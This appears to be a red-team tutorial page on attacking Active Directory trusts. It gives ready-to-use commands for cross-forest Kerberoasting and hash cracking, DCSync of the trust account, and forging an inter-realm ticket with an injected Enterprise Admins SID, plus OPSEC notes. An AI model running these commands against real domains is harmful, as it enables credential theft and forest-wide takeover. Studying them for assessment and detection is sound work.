Trusts and Cross-Forest Attacks
#Overview
Active Directory trusts allow principals from one domain or forest to access resources in another. Trust relationships create cross-boundary attack paths that can extend a compromise from a single domain to the entire forest or across forest boundaries. Understanding trust types, their direction, and the security controls in place (SID filtering, selective authentication, TGT delegation across trusts) is essential for determining whether and how a trust can be exploited.
#Prerequisites
- Credentials valid in the source domain (any privilege level)
- Network connectivity to Domain Controllers in both source and target domains
- Trust relationship between the domains (enumerate first)
- For cross-forest attacks: ability to resolve DNS across forest boundaries
#Detection & Enumeration
#Trust Discovery
# Windows — netdom (native tool)
netdom query trust
# Lists all trusts with direction and type
# PowerShell — Get-ADTrust
Get-ADTrust -Filter *
# Detailed trust information including SID filtering status
# Windows — nltest
nltest /domain_trusts
# Quick trust enumeration
# Impacket — lookupsid across trust
# If the trust is bidirectional, you can enumerate users in the target domain
lookupsid.py <source_domain>/<user>:<pass>@<target_dc>
# BloodHound
# Trusts are shown as edges between domain nodes
# Edge label includes trust type and direction
# Query: "Find all Trusts"
BASH
#Identifying Trust Types
# Trust Type from Get-ADTrust output:
# TrustType: 1 = Downlevel (NT4), 2 = Uplevel (AD / Forest)
# TrustDirection: 0=Disabled, 1=Inbound, 2=Outbound, 3=Bidirectional
# TrustAttributes: contains flags for forest trust, selective auth, SID filtering
# Forest trust enumeration
Get-ADTrust -Filter {TrustType -eq 2} | Format-List *
BASH
#Trust Types and Implications
| Trust Type | Description | Attack Implications |
|---|---|---|
| Parent-Child | Automatic trust within a forest between parent and child domains | SID filtering NOT applied. TGTs work across domains. |
| Tree-Root | Trust between root domains of different trees in same forest | Same as parent-child. Full forest trust. |
| Forest | Trust between two separate AD forests | SID filtering enabled by default. Selective auth optional. |
| External | Trust to a non-AD Kerberos realm (or another forest) | SID filtering enforced. No TGT delegation across trust. |
| MIT | Trust to a MIT Kerberos realm (e.g., MIT KDC) | Realm-specific. TGTs may not translate. |
#Exploitation / Execution
#SID Filtering Analysis
SID Filtering prevents users in a trusted domain from using forged SIDs (SID History) to escalate in the trusting domain. It is enabled by default on forest and external trusts but disabled on intra-forest trusts.
# Check if SID filtering is enabled
Get-ADTrust -Filter * | Select-Object Name, TrustAttributes
# TrustAttributes containing TRUST_ATTRIBUTE_QUARANTINED_DOMAIN (0x4) = SID filtering ENABLED
# If this flag is absent on a forest trust, SID history injection works across forests
# Netdom trust properties
netdom trust <trusting_domain> /domain:<trusted_domain> /quarantine
BASH
#Cross-Forest Kerberoasting
If a trust exists, an attacker can request TGS tickets for service accounts in the target forest using credentials from the source domain.
# Request tickets across the trust (requires bidirectional or outbound trust)
GetUserSPNs.py <target_domain>/ -dc-ip <target_dc_ip> -request \
-target-domain <target_domain_fqdn>
# With valid source domain credentials
GetUserSPNs.py <target_domain>/<source_user> -dc-ip <target_dc_ip> \
-request -target-domain <target_domain_fqdn>
# Provide source domain password when prompted
# Crack the TGS hashes from the target forest
hashcat -m 13100 <hash_file> /usr/share/wordlists/rockyou.txt --force
BASH
#Foreign ACL Principals Abuse
When a trust is configured, principals from the trusted domain can be added to ACLs in the trusting domain. This creates cross-forest escalation paths.
# BloodHound: query foreign group memberships
# Edge: MemberOf with foreign domain SID prefix
# Identify foreign principals with privileged access
# Look for SIDs from the source domain present in target domain privileged groups
Get-ADGroupMember -Identity "Domain Admins" | Where-Object {$_.SID -like "S-1-5-21-<SOURCE_DOMAIN>*"}
# If source domain users are members of target domain privileged groups,
# authenticate from source domain to target domain resources
BASH
#Trust Key Attacks
The inter-domain trust account password (stored in the trustedDomain object) can be used to forge inter-realm TGTs.
# DCSync the trust account (if in source domain and target domain trusts source)
# The trust account is named <TARGET_DOMAIN>$ in source domain
impacket-secretsdump <source_domain>/<da_user>@<source_dc> -just-dc-user "<TARGET_DOMAIN>$"
# This gives the trust key
# Forge inter-realm TGT
impacket-ticketer -nthash <trust_hash> -domain-sid <source_domain_sid> \
-domain <source_domain> -extra-sid <target_domain_sid>-519 \
-dc-ip <source_dc> Administrator
# -extra-sid injects Enterprise Admins (RID 519) from target domain
BASH
#Kerberos across Trusts
# Request TGT in source domain
getTGT.py -dc-ip <source_dc> <source_domain>/<user>:<pass>
export KRB5CCNAME=<user>.ccache
# Request service ticket in target domain (for intra-forest trusts)
# TGTs are automatically forwarded across parent-child and tree-root trusts
getST.py -spn cifs/<target_dc>.<target_domain> -dc-ip <target_dc> \
-k -no-pass <source_domain>/<user>
# For forest trusts (selective auth), TGT forwarding may be blocked
# Fall back to cross-forest Kerberoasting or foreign ACL attacks
BASH
#Common Pitfalls
- SID filtering blocks escalation: SID History injection doesn't work across forest trusts with quarantine enabled. Check TrustAttributes.
- DNS resolution: Cross-forest attacks require DNS resolution of the target domain. Add target DC to
/etc/hostsor configure DNS forwarding. - Selective authentication: Forest trusts with selective auth require explicit "Allowed to Authenticate" permission on target resources.
- One-way trust direction: A one-way trust only allows authentication in one direction. Verify the trust direction matches the attack path.
- TGT delegation: External trusts do not support TGT forwarding. Use password-based authentication across the trust.
#OPSEC Considerations
- Cross-domain Kerberos requests generate events in both the source and target domain's DC logs
- Foreign ACL modifications are logged as AD object changes
- Trust account credential dumping (DCSync on trust account) generates the same 4662 events as regular DCSync
- Cross-forest Kerberoasting generates 4769 events on the target KDC
- SID History injection leaves traces in PAC validation and can be flagged by ATA/MDI
#Post-Exploitation Value
- Extends domain compromise to entire forest (intra-forest trusts)
- Extends compromise across forest boundaries (forest trusts without SID filtering)
- Access to resources, data, and credentials in the target domain/forest
- Ability to establish persistence across domain/forest boundaries via foreign group membership
#Cross-References
#Tool References
| Tool | Link |
|---|---|
| Impacket (GetUserSPNs, ticketer, secretsdump) | https://github.com/fortra/impacket |
| netdom (Windows) | Built-in Windows tool |
| Get-ADTrust (PowerShell) | ActiveDirectory module |
| BloodHound | https://github.com/BloodHoundAD/BloodHound |
#Source Machines
- (Conceptual — cross-forest trust exploitation patterns documented from real AD security assessments)